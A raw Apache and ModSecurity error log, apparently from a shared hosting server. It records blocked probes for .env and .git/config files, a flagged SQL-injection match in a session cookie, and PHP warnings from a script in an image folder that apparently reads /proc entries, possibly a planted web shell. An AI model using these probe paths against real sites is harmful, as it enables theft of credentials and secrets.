[Mon May 11 15:26:13.928585 2026] [security2:error] [pid 1319885:tid 1319935] [client 43.135.144.126:39734] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "homin.fr"] [uri "/fr/"] [unique_id "agHY9VchVQ3tCn0m9OpaPQAAARc"], referer: http://homin.fr
[Mon May 11 15:26:46.977741 2026] [ssl:error] [pid 1319998:tid 1320022] (EAI 2)Name or service not known: [client 140.245.50.113:52017] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 15:26:46.977961 2026] [ssl:error] [pid 1319998:tid 1320022] AH01941: stapling_renew_response: responder error
[Mon May 11 15:27:20.733788 2026] [security2:error] [pid 1319998:tid 1320019] [client 49.234.192.248:44020] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-mobilite-regional.com"] [uri "/"] [unique_id "agHZOKt2WtvoFr7xvGzWHgAAAJM"]
[Mon May 11 15:28:17.768039 2026] [authz_core:error] [pid 1319885:tid 1319889] [client 47.128.125.87:14906] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/IXR/error_log
[Mon May 11 15:28:19.136206 2026] [ssl:error] [pid 1319998:tid 1320010] [client 98.84.1.175:63247] AH02032: Hostname totalcloud.fr (default host as no SNI was provided) and hostname castiglionecf.fr provided via HTTP have no compatible SSL setup for policy 'secure'
[Mon May 11 15:28:55.307211 2026] [security2:error] [pid 1320674:tid 1320704] [client 43.128.87.4:46776] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.of-crystal-lake.net"] [uri "/"] [unique_id "agHZl6O9RdIr1DwxYR2UTAAAAM8"]
[Mon May 11 15:29:08.905094 2026] [core:error] [pid 1319886:tid 1319914] [client 66.132.172.139:43010] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 15:29:08.905123 2026] [core:error] [pid 1319886:tid 1319914] [client 66.132.172.139:43010] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 15:29:12.488270 2026] [security2:error] [pid 1319886:tid 1319917] [client 43.155.129.131:48566] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "naturedetres.fr"] [uri "/"] [unique_id "agHZqKy-5-wpj6Sx56abFAAAAAw"]
[Mon May 11 15:29:46.116483 2026] [ssl:error] [pid 1319886:tid 1319933] (EAI 2)Name or service not known: [client 51.68.236.92:16625] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 15:29:46.117016 2026] [ssl:error] [pid 1319886:tid 1319933] AH01941: stapling_renew_response: responder error
[Mon May 11 15:29:54.446816 2026] [security2:error] [pid 1320398:tid 1320417] [client 43.156.156.96:33020] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHZ0uJEyNRN152ArOSO4AAAAFE"]
[Mon May 11 15:29:59.442840 2026] [authz_core:error] [pid 1319885:tid 1319922] [client 216.73.216.110:3298] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/lib/app/error_log
[Mon May 11 15:29:59.570120 2026] [core:error] [pid 1320674:tid 1320703] [client 104.210.140.134:15824] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 15:29:59.570186 2026] [core:error] [pid 1320674:tid 1320703] [client 104.210.140.134:15824] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 15:31:05.288142 2026] [security2:error] [pid 1319886:tid 1319908] [client 109.248.204.81:37065] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f789b3814befc240a820939f5c5c8e3f||1778507948||1778507588"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHaGay-5-wpj6Sx56abwAAAAAY"], referer: https://la-grande-fabrique.com/?page_id=1928
[Mon May 11 15:31:05.288616 2026] [security2:error] [pid 1319886:tid 1319908] [client 109.248.204.81:37065] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHaGay-5-wpj6Sx56abwAAAAAY"], referer: https://la-grande-fabrique.com/?page_id=1928
[Mon May 11 15:31:05.289805 2026] [security2:error] [pid 1319886:tid 1319908] [client 109.248.204.81:37065] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHaGay-5-wpj6Sx56abwAAAAAY"], referer: https://la-grande-fabrique.com/?page_id=1928
[Mon May 11 15:31:06.565381 2026] [security2:error] [pid 1320398:tid 1320423] [client 109.248.204.81:59485] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f789b3814befc240a820939f5c5c8e3f||1778507948||1778507588"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHaGuJEyNRN152ArOSPeAAAAFc"], referer: https://la-grande-fabrique.com/?page_id=1928
[Mon May 11 15:31:06.565636 2026] [security2:error] [pid 1320398:tid 1320423] [client 109.248.204.81:59485] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHaGuJEyNRN152ArOSPeAAAAFc"], referer: https://la-grande-fabrique.com/?page_id=1928
[Mon May 11 15:31:06.566639 2026] [security2:error] [pid 1320398:tid 1320423] [client 109.248.204.81:59485] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHaGuJEyNRN152ArOSPeAAAAFc"], referer: https://la-grande-fabrique.com/?page_id=1928
[Mon May 11 15:31:39.111236 2026] [ssl:error] [pid 1320398:tid 1320421] (EAI 2)Name or service not known: [client 205.210.31.165:64228] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 15:31:39.111533 2026] [ssl:error] [pid 1320398:tid 1320421] AH01941: stapling_renew_response: responder error
[Mon May 11 15:31:40.365038 2026] [ssl:error] [pid 1319886:tid 1319923] (EAI 2)Name or service not known: [client 205.210.31.165:64230] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 15:31:40.365084 2026] [ssl:error] [pid 1319886:tid 1319923] AH01941: stapling_renew_response: responder error
[Mon May 11 15:32:50.404750 2026] [security2:error] [pid 1319886:tid 1319919] [client 5.181.131.78:43169] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHagqy-5-wpj6Sx56acMwAAAA0"], referer: https://www.piregwan-genesis.com/
PHP Warning:  filesize(): stat failed for /proc/563/task/563/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/563/task/563/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/563/task/563/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/563/task/563/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/563/task/563/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/563/task/563/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 15:33:04.762835 2026] [security2:error] [pid 1320674:tid 1320704] [client 5.255.127.96:10906] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.webshop.totalcloud.fr"] [uri "/api/.env"] [unique_id "agHakKO9RdIr1DwxYR2VewAAAM8"]
[Mon May 11 15:33:04.763025 2026] [security2:error] [pid 1320674:tid 1320704] [client 5.255.127.96:10906] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.webshop.totalcloud.fr"] [uri "/api/.env"] [unique_id "agHakKO9RdIr1DwxYR2VewAAAM8"]
[Mon May 11 15:33:04.763110 2026] [security2:error] [pid 1319886:tid 1319911] [client 5.255.127.96:10916] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.webshop.totalcloud.fr"] [uri "/backend/.env"] [unique_id "agHakKy-5-wpj6Sx56acYwAAAAg"]
[Mon May 11 15:33:04.763329 2026] [security2:error] [pid 1319886:tid 1319911] [client 5.255.127.96:10916] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.webshop.totalcloud.fr"] [uri "/backend/.env"] [unique_id "agHakKy-5-wpj6Sx56acYwAAAAg"]
[Mon May 11 15:33:04.763488 2026] [security2:error] [pid 1320398:tid 1320404] [client 5.255.127.96:10894] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.webshop.totalcloud.fr"] [uri "/.env.production"] [unique_id "agHakOJEyNRN152ArOSQAAAAAEQ"]
[Mon May 11 15:33:04.763644 2026] [security2:error] [pid 1320398:tid 1320404] [client 5.255.127.96:10894] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.webshop.totalcloud.fr"] [uri "/.env.production"] [unique_id "agHakOJEyNRN152ArOSQAAAAAEQ"]
[Mon May 11 15:33:04.927622 2026] [security2:error] [pid 1319953:tid 1319974] [client 5.255.127.96:10886] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.webshop.totalcloud.fr"] [uri "/.env.local"] [unique_id "agHakOSQ-m-m0ukSShuETwAAAVM"]
[Mon May 11 15:33:04.927947 2026] [security2:error] [pid 1319953:tid 1319974] [client 5.255.127.96:10886] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.webshop.totalcloud.fr"] [uri "/.env.local"] [unique_id "agHakOSQ-m-m0ukSShuETwAAAVM"]
[Mon May 11 15:33:04.928401 2026] [security2:error] [pid 1319885:tid 1319888] [client 5.255.127.96:10882] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.webshop.totalcloud.fr"] [uri "/.env"] [unique_id "agHakFchVQ3tCn0m9OpbXwAAAQA"]
[Mon May 11 15:33:04.928643 2026] [security2:error] [pid 1319885:tid 1319888] [client 5.255.127.96:10882] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.webshop.totalcloud.fr"] [uri "/.env"] [unique_id "agHakFchVQ3tCn0m9OpbXwAAAQA"]
[Mon May 11 15:33:04.940899 2026] [security2:error] [pid 1320674:tid 1320693] [client 5.255.127.96:10900] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.webshop.totalcloud.fr"] [uri "/app/.env"] [unique_id "agHakKO9RdIr1DwxYR2VfAAAAMM"]
[Mon May 11 15:33:04.941286 2026] [security2:error] [pid 1320674:tid 1320693] [client 5.255.127.96:10900] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.webshop.totalcloud.fr"] [uri "/app/.env"] [unique_id "agHakKO9RdIr1DwxYR2VfAAAAMM"]
[Mon May 11 15:33:05.084742 2026] [security2:error] [pid 1320674:tid 1320704] [client 5.255.127.96:10906] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.webshop.totalcloud.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHakKO9RdIr1DwxYR2VewAAAM8"]
[Mon May 11 15:33:05.118537 2026] [security2:error] [pid 1319886:tid 1319911] [client 5.255.127.96:10916] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.webshop.totalcloud.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHakKy-5-wpj6Sx56acYwAAAAg"]
[Mon May 11 15:33:05.246004 2026] [security2:error] [pid 1320398:tid 1320404] [client 5.255.127.96:10894] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.webshop.totalcloud.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHakOJEyNRN152ArOSQAAAAAEQ"]
[Mon May 11 15:33:05.277634 2026] [security2:error] [pid 1319953:tid 1319974] [client 5.255.127.96:10886] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.webshop.totalcloud.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHakOSQ-m-m0ukSShuETwAAAVM"]
[Mon May 11 15:33:05.283557 2026] [security2:error] [pid 1319885:tid 1319888] [client 5.255.127.96:10882] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.webshop.totalcloud.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHakFchVQ3tCn0m9OpbXwAAAQA"]
[Mon May 11 15:33:05.283612 2026] [security2:error] [pid 1320674:tid 1320693] [client 5.255.127.96:10900] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.webshop.totalcloud.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHakKO9RdIr1DwxYR2VfAAAAMM"]
[Mon May 11 15:33:06.501098 2026] [security2:error] [pid 1319885:tid 1319895] [client 34.88.158.29:59596] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.git/config"] [unique_id "agHaklchVQ3tCn0m9OpbYAAAAQY"]
[Mon May 11 15:33:06.501351 2026] [security2:error] [pid 1319885:tid 1319895] [client 34.88.158.29:59596] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.git/config"] [unique_id "agHaklchVQ3tCn0m9OpbYAAAAQY"]
[Mon May 11 15:33:06.501875 2026] [security2:error] [pid 1319885:tid 1319895] [client 34.88.158.29:59596] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.git/config"] [unique_id "agHaklchVQ3tCn0m9OpbYAAAAQY"]
